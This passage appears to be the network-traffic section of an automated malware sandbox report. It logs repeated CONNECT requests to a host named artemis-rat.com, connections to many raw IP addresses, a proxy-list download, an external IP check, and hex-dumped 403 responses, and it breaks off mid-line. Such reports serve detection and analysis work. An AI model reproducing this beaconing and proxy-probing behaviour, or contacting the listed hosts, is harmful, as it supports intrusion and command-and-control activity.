                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 195.178.56.33
                Source: unknownTCP traffic detected without corresponding DNS query: 50.172.75.121
                Source: unknownTCP traffic detected without corresponding DNS query: 191.97.9.228
                Source: unknownTCP traffic detected without corresponding DNS query: 161.97.173.42
                Source: unknownTCP traffic detected without corresponding DNS query: 190.109.72.33
                Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.3
                Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.3
                Source: unknownTCP traffic detected without corresponding DNS query: 38.162.21.241
                Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.3
                Source: unknownTCP traffic detected without corresponding DNS query: 51.222.155.142
                Source: unknownTCP traffic detected without corresponding DNS query: 124.198.74.90
                Source: unknownTCP traffic detected without corresponding DNS query: 13.38.176.104
                Source: unknownTCP traffic detected without corresponding DNS query: 101.51.124.223
                Source: unknownTCP traffic detected without corresponding DNS query: 8.242.178.5
                Source: unknownTCP traffic detected without corresponding DNS query: 102.128.173.1
                Source: unknownTCP traffic detected without corresponding DNS query: 103.84.178.193
                Source: unknownTCP traffic detected without corresponding DNS query: 50.173.140.150
                Source: unknownTCP traffic detected without corresponding DNS query: 195.177.217.131
                Source: unknownTCP traffic detected without corresponding DNS query: 104.16.105.142
                Source: unknownTCP traffic detected without corresponding DNS query: 193.239.86.249
                Source: unknownTCP traffic detected without corresponding DNS query: 190.4.205.226
                Source: unknownTCP traffic detected without corresponding DNS query: 75.119.200.27
                Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.3
                Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.3
                Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.3
                Source: unknownTCP traffic detected without corresponding DNS query: 164.92.86.113
                Source: unknownTCP traffic detected without corresponding DNS query: 35.185.196.38
                Source: unknownTCP traffic detected without corresponding DNS query: 191.102.254.26
                Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.3
                Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.3
                Source: unknownTCP traffic detected without corresponding DNS query: 211.234.125.3
                Source: unknownTCP traffic detected without corresponding DNS query: 117.54.106.241
                Source: unknownTCP traffic detected without corresponding DNS query: 41.57.37.125
                Source: unknownTCP traffic detected without corresponding DNS query: 103.188.177.22
                Source: unknownTCP traffic detected without corresponding DNS query: 190.151.166.122
                Source: unknownTCP traffic detected without corresponding DNS query: 103.152.112.145
                Source: unknownTCP traffic detected without corresponding DNS query: 103.81.221.101
                Source: unknownTCP traffic detected without corresponding DNS query: 37.26.223.96
                Source: unknownTCP traffic detected without corresponding DNS query: 94.130.94.45
                Source: unknownTCP traffic detected without corresponding DNS query: 81.43.68.47
                Source: unknownTCP traffic detected without corresponding DNS query: 147.124.212.31
                Source: unknownTCP traffic detected without corresponding DNS query: 50.174.7.154
                Source: unknownTCP traffic detected without corresponding DNS query: 192.241.177.96
                Source: unknownTCP traffic detected without corresponding DNS query: 146.59.155.82
                Source: unknownTCP traffic detected without corresponding DNS query: 52.13.248.29
                Source: unknownTCP traffic detected without corresponding DNS query: 213.226.16.46
                Source: unknownTCP traffic detected without corresponding DNS query: 35.79.120.242
                Source: unknownTCP traffic detected without corresponding DNS query: 132.148.167.243
                Source: unknownTCP traffic detected without corresponding DNS query: 114.231.46.18
                Source: unknownTCP traffic detected without corresponding DNS query: 117.160.250.130
                Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: github.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Tue, 12 Mar 2024 07:36:58 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 12 Mar 2024 07:36:59 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" 